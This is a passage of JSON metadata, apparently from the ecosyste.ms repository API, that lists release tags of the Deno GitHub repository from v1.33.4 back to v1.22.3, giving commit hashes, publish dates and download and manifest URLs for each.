ublished_at":"2023-05-18T16:21:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.4/manifests"},{"name":"v1.33.3","sha":"12ba2d311bb6cce7c1bf2567748987e91585d540","kind":"commit","published_at":"2023-05-12T11:06:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.3/manifests"},{"name":"v1.33.2","sha":"c2a61a4192609615beba363f5606e6e04ae60c97","kind":"commit","published_at":"2023-05-04T14:39:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.2/manifests"},{"name":"v1.33.1","sha":"d5f52ef7ac20cb116fad574e3017f194124be312","kind":"commit","published_at":"2023-04-28T17:05:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.1/manifests"},{"name":"v1.33.0","sha":"39ece1fe0ddacc2cbf182403c9e7085bc01df5a6","kind":"commit","published_at":"2023-04-27T23:18:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.0/manifests"},{"name":"v1.32.5","sha":"6cfca9b33eb0647fc73ddfc20349ae9fb943d01a","kind":"commit","published_at":"2023-04-18T18:31:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.5/manifests"},{"name":"v1.32.4","sha":"709cfd6d91d335c16337be9339d45250e02ae247","kind":"commit","published_at":"2023-04-12T15:17:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.4/manifests"},{"name":"v1.32.3","sha":"73d472149ce6dd360a71ca5d1819d3f8f27754f8","kind":"commit","published_at":"2023-04-01T22:51:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.3/manifests"},{"name":"v1.32.2","sha":"24e0b31096682f0ec576e0021c1925611ec4e090","kind":"commit","published_at":"2023-03-31T20:41:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.2/manifests"},{"name":"v1.32.1","sha":"99b5eaa2f4f81b0f6fb46a388808a0d8f40b91e1","kind":"commit","published_at":"2023-03-23T20:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.1/manifests"},{"name":"v1.32.0","sha":"d06fdf6add1b3c55fc5f4a24956f17a363d513a4","kind":"commit","published_at":"2023-03-22T23:03:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.0/manifests"},{"name":"v1.31.3","sha":"f64adbe1a3b924b9436afa39b4302c5718bbb759","kind":"commit","published_at":"2023-03-16T05:41:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.3/manifests"},{"name":"v1.31.2","sha":"fc6edac5978e7a5e44fdcee05085c7492f0ccba9","kind":"commit","published_at":"2023-03-10T06:41:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.2/manifests"},{"name":"v1.31.1","sha":"86785f21194460d713276dca212302fa1bb1c943","kind":"commit","published_at":"2023-02-25T02:17:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.1/manifests"},{"name":"v1.31.0","sha":"b6ac54815c1bcfa44a45b3f2c1c982829482477f","kind":"commit","published_at":"2023-02-24T00:20:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.0/manifests"},{"name":"v1.30.3","sha":"f3fb8ee18826e66d3896ea864d2bedaed6c79308","kind":"commit","published_at":"2023-02-07T01:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.3/manifests"},{"name":"v1.30.2","sha":"cee13304ffe58286fcfab3526c46f95a7e23825d","kind":"commit","published_at":"2023-02-03T14:46:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.2/manifests"},{"name":"v1.30.1","sha":"000fb83c587a17118d83b990f1d08c98bb9cce2a","kind":"commit","published_at":"2023-02-02T14:26:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.1/manifests"},{"name":"v1.30.0","sha":"a6f915c22f34921780b4bcb8b6da8cd3bd20d5a8","kind":"commit","published_at":"2023-01-25T23:15:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.0/manifests"},{"name":"v1.29.4","sha":"65db94feba9d4d51a09b74629f566dbc90484fba","kind":"commit","published_at":"2023-01-16T22:07:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.4/manifests"},{"name":"v1.29.3","sha":"9806dcc91496ab12c7fba238d411e23c22e2a302","kind":"commit","published_at":"2023-01-13T17:17:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.3/manifests"},{"name":"v1.29.2","sha":"14c4c8f9340235bd1ddb5388558c984beb0bb6d9","kind":"commit","published_at":"2023-01-05T13:37:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.2/manifests"},{"name":"v1.29.1","sha":"145013ab7fb00c7293ce33806f26dc4083a8da66","kind":"commit","published_at":"2022-12-15T16:32:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.1/manifests"},{"name":"v1.29.0","sha":"0d4e4af7acf82c1365999a7281910daa05f0e982","kind":"commit","published_at":"2022-12-14T23:22:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.0/manifests"},{"name":"v1.28.3","sha":"74064c9d8c222b33b2a552ea0af1054f57002a96","kind":"commit","published_at":"2022-12-01T10:10:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.3/manifests"},{"name":"v1.28.2","sha":"1aca16e23998ee54f6a15217cd4cc6b8b13299b7","kind":"commit","published_at":"2022-11-24T20:22:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.2/manifests"},{"name":"v1.28.1","sha":"2743d42099cb0596f03c7d1252e5cfbb53f7a9ec","kind":"commit","published_at":"2022-11-16T23:35:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.1/manifests"},{"name":"v1.28.0","sha":"916598f8a77d1fb7b7feb577e600ead2bc45045f","kind":"commit","published_at":"2022-11-13T20:31:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.0/manifests"},{"name":"v1.27.2","sha":"5cd5cfa8d655e8a71441cf9736df93efde75153c","kind":"commit","published_at":"2022-11-08T21:42:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.2/manifests"},{"name":"v1.27.1","sha":"d448c2950db2ed474405ace6a0a180301eeaa68d","kind":"commit","published_at":"2022-11-03T21:52:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.1/manifests"},{"name":"v1.27.0","sha":"b0fb8fa9dc08640e77eb0ab888a483db18a52a4b","kind":"commit","published_at":"2022-10-27T15:13:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.0/manifests"},{"name":"v1.26.2","sha":"d1f432bf12e5de645d45f1f2738a53981f39fa5b","kind":"commit","published_at":"2022-10-17T18:51:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.2/manifests"},{"name":"v1.26.1","sha":"753b60dd9b0c9bb5220609f2fe65ad06957690d6","kind":"commit","published_at":"2022-10-06T17:16:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.1/manifests"},{"name":"v1.26.0","sha":"d8827514ffef04c2e1732f7033ff6a374dd94d54","kind":"commit","published_at":"2022-09-28T22:10:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.0/manifests"},{"name":"v1.25.4","sha":"02afbe2af550ad5223d982e8fdd37f778b9d828c","kind":"commit","published_at":"2022-09-22T18:01:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.4/manifests"},{"name":"v1.25.3","sha":"f561e765a75c749f1d1e2d6584edf6018435e6e1","kind":"commit","published_at":"2022-09-15T17:46:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.3/manifests"},{"name":"v1.25.2","sha":"3c5af2ba495b2d5770b3f5ed12e202ba2089ebda","kind":"commit","published_at":"2022-09-09T08:54:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.2/manifests"},{"name":"v1.25.1","sha":"1e78804d5c0b8204978dd77431ac33d8d16ce5bc","kind":"commit","published_at":"2022-09-02T00:07:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.1/manifests"},{"name":"v1.25.0","sha":"8986e2ced4adbf6185aea02a580036aa92c2872c","kind":"commit","published_at":"2022-08-24T22:20:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.0/manifests"},{"name":"v1.24.3","sha":"c79127061438234a60f63cf9d0a276328961f971","kind":"commit","published_at":"2022-08-11T18:38:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.3/manifests"},{"name":"v1.24.2","sha":"44ade24fb213875814c431c87abb3f79ecab1fef","kind":"commit","published_at":"2022-08-04T20:49:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.2/manifests"},{"name":"v1.24.1","sha":"fa9698fe9ec3ceb660c1865eb75f07a0bc5b90c5","kind":"commit","published_at":"2022-07-28T17:22:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.1/manifests"},{"name":"v1.24.0","sha":"f0e01682cce638303e3b6997788667a0f71dff8d","kind":"commit","published_at":"2022-07-20T23:28:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.0/manifests"},{"name":"v1.23.4","sha":"b0de3031dcfe6eab1156a2546b996005d1c07cfe","kind":"commit","published_at":"2022-07-12T18:55:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.4/manifests"},{"name":"v1.23.3","sha":"0b07d1a40318147ec0782af9fe99048d5ef80984","kind":"commit","published_at":"2022-07-05T17:00:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.3/manifests"},{"name":"v1.23.2","sha":"5a5d3084ab0f20c511a70a1f2e12ef7bdd184ec2","kind":"commit","published_at":"2022-06-30T19:31:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.2/manifests"},{"name":"v1.23.1","sha":"9f9941c03b942469fb651477503f8cd19f18a1ab","kind":"commit","published_at":"2022-06-23T19:50:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.1/manifests"},{"name":"v1.23.0","sha":"e7ea4edc8a1a4fc339ac2267d9512a9374bc2ce5","kind":"commit","published_at":"2022-06-15T23:02:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.0/manifests"},{"name":"v1.22.3","sha":"43e7c5d328a5a17a8c33362caf642d6ded49f179","kind":"commit","published_at":"2022-06-09T18:55:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/